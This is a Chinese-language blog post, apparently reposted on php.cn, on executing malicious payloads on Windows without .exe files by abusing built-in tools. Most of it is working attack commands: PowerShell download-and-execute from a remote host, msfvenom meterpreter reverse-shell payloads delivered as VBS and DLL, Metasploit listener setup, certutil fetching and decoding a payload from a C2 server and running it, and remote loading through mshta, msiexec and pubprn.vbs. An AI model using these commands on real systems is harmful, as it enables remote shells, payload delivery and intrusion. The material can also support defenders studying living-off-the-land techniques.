windows无exe-linux运维-PHP中文网

windows无exe

星夢妙者

发布： 2025-07-20 08:46:12

原创

465人浏览过

大家好，很高兴再次与你们见面，我是你们的朋友全栈君。

在Windows系统中，恶意脚本的加载和执行可以通过多种无需可执行文件（exe）的方式来实现。这些方法利用了Windows自带的解析器和工具，具体包括以下几种：

恶意脚本加载方式

PowerShell、VBScript、批处理文件和JavaScript

这些脚本可以通过Windows自带的解析器运行，如powershell.exe、cscript.exe、cmd.exe和mshta.exe。通过上传或远程加载相应的payload脚本，并直接调用解析器运行，可以实现恶意代码的执行。可以使用Invoke-Obfuscation或者Invoke-DOSfuscation等工具进行混淆。

Windows原生工具

Windows自带的工具如regsvr32.exe、rundll32.exe、certutil.exe、schtasks.exe、wmic.exe等，以及脚本类型的winrm.vbs、wmiexec.vbs、pubprn.vbs等，可以用于执行恶意代码、启动程序、执行脚本、窃取数据、横向扩展和维持访问。

具体示例

PowerShell

powershell "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/Script.ps1'); Script [argv]"

登录后复制

mshta.exe

use exploit/windows/misc/hta_server
set lhost x.x.x.x
set lport 4444
run

登录后复制

mshta.exe执行

mshta http://192.168.164.128:8080/lWdH9aFeeIe.hta

登录后复制

windows无exe

CScript.exe和WScript.exe

这两个工具可以解析和运行VBScript和JavaScript脚本。WScript将输出结果显示在对话框中，而CScript则以命令行形式显示输出结果。使用方法如下：

cscript %TEMP%\log.vbs 或者 wscript C:\test.js

登录后复制

使用msfvenom生成VBS脚本

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f vbs -o 123.vbs

登录后复制

使用Metasploit监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
run

登录后复制

执行生成的VBS脚本

cscript 123.vbs

登录后复制

regsvr32.exe加载DLL

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f dll -o 123.dll

登录后复制

使用regsvr32.exe执行DLL

regsvr32 /u /s 123.dll

登录后复制

certutil.exe

certutil.exe -urlcache -split -f [URL] outfile.file
certutil.exe -verifyctl -f -split http://www.baidu.com #无法绕过defender

登录后复制

编码

base64 payload.exe > /var/www/html/update.txt

登录后复制

解码并执行

certutil -urlcache -split -f http://cc_server/update.txt & certutil -decode update.txt update.exe & update.exe

登录后复制

winrm.vbs

cscript C:windowssystem32winrm.vbs invoke Create wmicimv2/Win32_Process -SkipCAcheck -SkipCNcheck -file:123.xml

登录后复制

123.xml内容

<?xml version="1.0" encoding="UTF-8"?><create_input xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Process"><commandline>calc.exe</commandline><currentdirectory>C:</currentdirectory></create_input>

登录后复制

windows无exe

工作易人才招聘系统金牌型

工作易人才招聘系统作为最受欢迎的.net开源人才系统平台，并获得了了国家《计算机软件著作权版权证书》。并努力为用户提供了各种功能。用户可以利用这些功能搭建自己的专业招聘网站。工作易人才招聘系统是基于Windows平台，采用微软.Net(Aspx)+SQLServer 2005为开发运行环境，语言天生运算速度是ASP的2-3倍，安全和稳定性更是asp所无法比拟和超越的。其安装简单方便，只需

查看详情

无文件执行

Winrm invoke Create wmicimv2/Win32_Process @{    CommandLine="calc.exe";CurrentDirectory="C:"}

登录后复制

windows无exe

msiexec.exe

C:WindowsSystem32msiexec.exe /q /i http://192.168.164.128:8080/123.msi

登录后复制

wmic.exe

# 暂无

登录后复制

pubprn.vbs

位于C:WindowsSystem32Printing_Admin_Scripts下的语言目录中，可以用来解析sct文件。

pubprn.vbs 127.0.0.1 script:http://x.x.x.x/payload1.sct

登录后复制

参考资料：https://www.php.cn/link/29353ce24ad093d9324c479b7a1bd107

发布者：全栈程序员栈长，转载请注明出处：https://www.php.cn/link/f48db3cd91ebb288ff33e95493b6329b

原文链接：https://www.php.cn/link/c8377ad2a50fb65de28b11cfc628d75c

以上就是windows无exe的详细内容，更多请关注php中文网其它相关文章！

大家都在看：

Linux如何处理JSON数据_LinuxcJSON库使用教程 Linux如何实现可扩展的配置中心_Linux中心化配置模块 Linux系统如何安装常用命令工具_Linux基础工具安装完整教程 Linux 安全：如何使用 sqlmap 检测 SQL 注入 (测试用途) Linux 运维：如何定制 Bash 提示符 (PS1) 显示 Git 分支信息